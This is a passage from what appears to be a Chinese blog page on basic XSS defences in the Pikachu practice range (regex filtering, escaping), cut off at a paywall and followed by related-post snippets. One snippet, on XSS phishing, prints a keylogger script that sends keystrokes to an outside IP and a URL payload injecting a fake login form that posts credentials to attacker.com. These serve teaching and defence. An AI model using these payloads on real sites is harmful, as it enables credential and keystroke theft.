Pikachu中 Xss的简单防御剖析

原创

已于 2024-03-20 12:29:04 修改 · 370 阅读

3 ·

CC 4.0 BY-SA版权

文章标签：

#xss #正则表达式 #可用性测试

于 2023-04-20 22:29:01 首次发布

本文详细剖析了Pikachu中针对XSS攻击的防御措施，包括输入过滤、正则表达式替换、HTML转义、JavaScript编码、长度控制、模板引擎安全设置、避免内联事件和拼接HTML等方法，旨在提高网站的安全性。

Pikachu中 Xss的简单防御剖析 --小文文

xss的防范措施总原则：

输入做过滤，输出做转义

过滤：比如对输入的东西做要求，如输入手机号，只能输入数字
转义∶所有输出到前端的数据都根据输出点进行转义，比如输出到html中进行html实体转义，输入到JS里面的进行js转义。

输入过滤

第一part + 防御

例子：输入内容<script>alert(‘123’)</script>

说明:我们输入的<script></script>被过滤掉了

这里使用,实现简单的防御

//preg_replace正则表达式对<script进行替换为空,也就是过滤掉
$message=preg_replace('/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/', '', $_GET['message']);

第二part 严谨的防御++

防御大小写输入内容:<SCRIPT>alert(‘123’)</SCRIPT>

点击submit，有下图所示：

利用escapeHTML（）函数，实现防御

防御核心

//这里会使用正则对<script进行替换为空,也就是过滤掉,修改方式是：添加escape（）函数
$message=escape(preg_replace('/<(.*)

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

m123456wer

关注关注

2
点赞
踩
3

收藏

觉得还不错? 一键收藏
2
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

Pikachu靶场之XSS漏洞详解

m0_46467017的博客

05-13

1万+

Pikachu靶场之XSS漏洞详解前言XSS漏洞简述第1关反射型xss(get)第2关反射性xss(post)第3关存储型xss第4关 DOM型xss第5关 DOM型xss-x第6关 xss盲打第7关 xss之过滤第8关 xss之htmlspecialchars第9关 xss之href输出第10关 xss之js输出前言本篇文章用于巩固对自己xss漏洞的学习总结，其中部分内容借鉴了以下博客。链接: pikachu XSS Cross-Site Scripting皮卡丘漏洞平台通关系列链接: P

Pikachu靶场-xss详解

qq_53083285的博客

10-30

8265

Picachu靶场-xss跨站脚本漏洞概述跨站脚本漏洞类型及测试流程反射型XSS（post&get）存储型XSSDom型XSSxss-获取cookiexss-进行钓鱼xss-获取键盘记录xss盲打xss的过滤和绕过xss输出在href和js中的案例xss的防范措施 XSS-跨站脚本漏洞目录跨站脚本漏洞概述 Cross-Site Scripting 简称为“CSS”，为避免与前端叠成样式表的缩写"CSS"冲突，故又称XSS。一般XSS可以分为如下几种常见类型： 1.反射性XSS; 2.存储型XSS;

2 条评论您还未登录，请先登录后发表或查看评论

pikachu靶场xss注入漏洞与分析测试，零基础入门到精通，收藏这篇就够了

最新发布

leah126的博客

10-30

836

*工具实战：**集中训练抓包工具（Wireshark）、渗透测试工具（Nmap）、漏洞扫描工具（Nessus 基础版）的使用，结合模拟场景练习工具应用（掌握基础扫描逻辑，为 SRC 漏扫工具进阶做准备）。实战技能训练：开展漏洞扫描、漏洞利用、电商系统渗透测试、内网渗透、权限提升（Windows、Linux）、代码审计等实战训练，结合运维中熟悉的系统环境设计测试场景（强化红蓝对抗攻击端技术能力）。红蓝对抗基础：学习护网行动背景、红蓝对抗规则（攻击范围、禁止行为）、红蓝双方角色职责（红队：模拟攻击；

Pikachu之XSS

weixin_48621644的博客

10-14

3374

小羊学安全任重而道远~

pikachu--xss

鲨鱼辣椒的博客

05-12

5284

XSS概述 XSS全称跨站脚本（Cross Site Scripting）是web中最为常见的漏洞之一，也是危害特别大的一种漏洞，一直高居漏洞排行榜的前几名。XSS漏洞的成因是没有对WEB前端的输入边界尽心严格的过滤，造成攻击者可以通过构造脚本语言使得输入的内容被当成正常的HTML来执行（类似于SQL注入），从而产生危害。xss漏洞危害的对象主要是前端用户，并且可以用来进行钓鱼、前端js挖矿、用户cookie获取、甚至可以结合浏览器自身的漏洞对主机进行远程控制等。 XSS（窃取cookie）攻击流程 .

pikachu靶场XSS通关攻略

2401_82451607的博客

08-22

1993

pikachu靶场xxs通关攻略

pikachu-XSS通关教程

weixin_68416970的博客

07-26

1049

XSS基础知识和pikachu-XSS部分通关教程

pikachu-XSS跨站脚本通关

qq_74191138的博客

04-28

1784

我们可以把DOM理解为一个一个访问HTML的标准的编程接口。DOM是一个前端的接口，并没有和后端做任何的交互。W3Cschool上有一个介绍DOM的树形图我把他截取下来了。

pikachu-XSS（跨站脚本攻击）

a1245678899的博客

11-09

1312

XSS漏洞的成因是没有对WEB前端的输入边界尽心严格的过滤，造成攻击者可以通过构造脚本语言使得输入的内容被当成正常的HTML来执行（类似于SQL注入），从而产生危害。造成DOM型XSS的原因是前端的输入被DOM给获取到了，通过DOM又在前端输出，跟反射型和存储型比起来，它是不经过后台交互的。存储型XSS和反射型XSS形成的原因是一样的，不同的是存储型XSS下攻击者的可以将脚本注入到后台存储起来，构成更加持久的危害。编码，后台过滤了特殊字符，比如标签，但该标签可以被各种编码，后台不一定过。

pikachu之xss

qq_43665434的博客

01-31

860

pikachu之xss XSS 跨站脚本漏洞概述原因形成xss的主要原因是程序对输入和输出的控制不够严格，导致“精心构造”的脚本输入后，在输出到前端时被浏览器当作有效代码解析执行从而产生危害。地位一直被评估为web漏洞中危害较大的漏洞，在OWASP TOP10的排名中一直属于前三的江湖地位危害对象 xss是一种发生在web前端的漏洞，所以其危害的对象也主要是前端用户危害可以用来进行钓鱼攻击、前端js挖矿、用户cookie获取。设置可以结合浏览器自身的漏洞对用户主机进行远程控制攻击流程插

Pikachu-XSS通关攻略

qq_65852138的博客

08-22

1119

Pikachu-XSS通关攻略

pikachu - Cross-Site Scripting（XSS）

风依旧的博客

01-09

882

‍XSS（跨站脚本）概述Cross-Site Scripting 简称为“CSS”，为避免与前端叠成样式表的缩写"CSS"冲突，故又称XSS。一般XSS可以分为如下几种常见类型：1.反射型XSS;2.存储型XSS;3.DOM型XSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞，在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞，所以其危害的对象也是前端用户。

pikachu平台xss漏洞详解

m0_74786138的博客

11-26

3273

Cross-Site Scripting 简称为“CSS”，为避免与前端叠成样式表的缩写"CSS"冲突，故又称XSS。一般XSS可以分为如下几种常见类型：1.反射性XSS;2.存储型XSS;3.DOM型XSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞，在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞，所以其危害的对象也是前端用户。

pikache靶场通关——XSS漏洞

p36273的博客

06-17

4343

Cross-Site Scripting 简称为“CSS”，为避免与前端叠成样式表的缩写"CSS"冲突，故又称XSS。反射性XSS;存储型XSS;DOM型XSS;XSS是一种发生在前端浏览器端的漏洞，所以其危害的对象也是前端用户。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理，导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。输入过滤：对输入进行过滤，不允许可能导致XSS攻击的字符输入;输出转义：根据输出点的位置对输出到前端的内容进行适当转义;

pikachu靶场（xss通关教程）

记录学习

05-11

2974

pikachu靶场通关之xss

Pikachu-XSS（跨站脚本）

m0_49025459的博客

04-06

1775

概述 Cross-Site Scripting 简称为“CSS”，为避免与前端叠成样式表的缩写"CSS"冲突，故又称XSS。一般XSS可以分为如下几种常见类型： 1.反射性XSS; 2.存储型XSS; 3.DOM型XSS; XSS漏洞一直被评估为web漏洞中危害较大的漏洞，在OWASP TOP10的排名中一直属于前三的江湖地位。 XSS是一种发生在前端浏览器端的漏洞，所以其危害的对象也是前端用户。形成XSS漏洞的主要原因

XSS漏洞：pikachu靶场中的XSS通关

qq_68163788的博客

05-25

2489

在pikachu靶场中的XSS通关是一种漏洞攻击技术，通过在输入框中注入恶意脚本代码来实现攻击。攻击者可以利用XSS漏洞窃取用户的cookie信息、重定向用户到恶意网站或者篡改网页内容等。在pikachu靶场中，攻击者可以通过输入恶意代码实现跨站脚本攻击，从而获取敏感信息或者控制网页行为。要防范XSS漏洞，网站开发者应该对用户输入进行严格过滤和验证，避免恶意代码的注入。

Pikachu——Xss钓鱼

07-07

### XSS 钓鱼攻击原理 XSS（跨站脚本攻击）是一种常见的Web安全漏洞，攻击者通过向网页中注入恶意脚本，使其他用户在浏览该页面时执行这些脚本。钓鱼攻击是XSS的一个典型应用场景，其核心思想是利用恶意脚本诱导用户输入敏感信息（如用户名、密码、Cookie等），并将这些信息发送到攻击者控制的服务器。在Pikachu靶场中，XSS钓鱼攻击通常分为反射型、存储型和DOM型三种形式： - **反射型XSS**：恶意脚本作为URL参数传递，并在页面上直接显示或执行，通常需要用户点击特定链接来触发。 - **存储型XSS**：恶意脚本被存储在服务器端（如数据库中），当其他用户访问包含该脚本的页面时会自动执行。 - **DOM型XSS**：攻击不经过后端处理，而是通过修改页面的DOM对象来触发脚本执行，常用于前端逻辑处理不当的场景。钓鱼攻击的关键在于构造一个伪装成正常页面的表单或弹窗，诱导用户输入敏感信息，随后通过JavaScript将数据发送到攻击者的服务器。 ### 示例分析 #### 1. 存储型XSS实现键盘记录在Pikachu靶场中，攻击者可以构造一个恶意脚本并提交到目标网站的留言板、评论区等可存储用户输入的地方。一旦有用户访问该页面，恶意脚本就会在用户的浏览器中执行，并开始监听键盘事件，记录用户的每一次按键操作，包括可能输入的用户名和密码。示例代码如下： ```html <script> document.addEventListener("keydown", function(event) { let key = event.key; // 将按键记录发送到攻击者服务器 fetch('http://116.204.99.177/pkxss/xfish/log.php?key=' + encodeURIComponent(key)); }); </script> ``` 上述代码会在页面加载后监听所有键盘事件，并将每次按键发送到指定的远程服务器，攻击者可以在服务器端收集这些数据以获取用户的敏感信息[^1]。 #### 2. 反射型XSS钓鱼表单攻击者构造一个带有恶意脚本的URL，诱导用户点击。当用户访问该链接时，脚本会在页面上插入一个伪造的登录表单，用户输入的凭证会被发送到攻击者的服务器。示例URL： ``` http://pikachu.example.com/?name=<script>document.body.innerHTML += '<form action=\"http://attacker.com/catch\" method=\"POST\">Username:<input type=\"text\" name=\"user\"><br>Password:<input type=\"password\" name=\"pass\"><br><input type=\"submit\" value=\"Login\"></form>';</script> ``` 用户点击该链接后，页面上会出现一个伪装成原网站的登录表单。用户输入的信息会被提交到攻击者的服务器，从而完成钓鱼过程[^2]。 #### 3. DOM型XSS URL参数注入 DOM型XSS通常发生在前端处理URL参数时未进行适当的过滤和转义。例如，页面根据URL中的某个参数动态更新页面内容，攻击者可以构造恶意参数值，使其包含JavaScript代码。示例代码： ```html <script> let search = location.search.substring(1); document.getElementById("searchResult").innerHTML = "You searched for: " + search; </script> ``` 攻击者构造的恶意链接为： ``` http://pikachu.example.com/search.html?keyword=<script>alert(document.cookie)</script> ``` 如果页面没有对`search`变量进行处理，恶意脚本将在用户浏览器中执行，进而窃取用户的Cookie信息[^4]。 ### 防御措施为了防止XSS钓鱼攻击，开发人员应采取以下几种主要防御手段： - **输入过滤与转义**：对所有来自用户的输入进行严格的验证和过滤，确保不会将其作为HTML或JavaScript代码执行。可以使用HTML实体编码（如`<`代替`<`）来防止恶意脚本注入。 - **输出上下文感知编码**：根据输出位置（HTML、JavaScript、CSS等）采用不同的编码方式，避免特殊字符被浏览器错误解析。 - **使用Content Security Policy (CSP)**：通过设置HTTP头`Content-Security-Policy`，限制页面只能加载指定来源的脚本，阻止内联脚本执行，有效缓解XSS攻击。 - **避免内联事件处理**：尽量避免在HTML标签中使用`onclick`、`onload`等内联事件属性，改用外部JavaScript绑定事件。 - **启用HttpOnly Cookie标志**：设置Cookie的`HttpOnly`属性为`true`，防止JavaScript读取敏感Cookie数据，降低XSS攻击的危害。 ---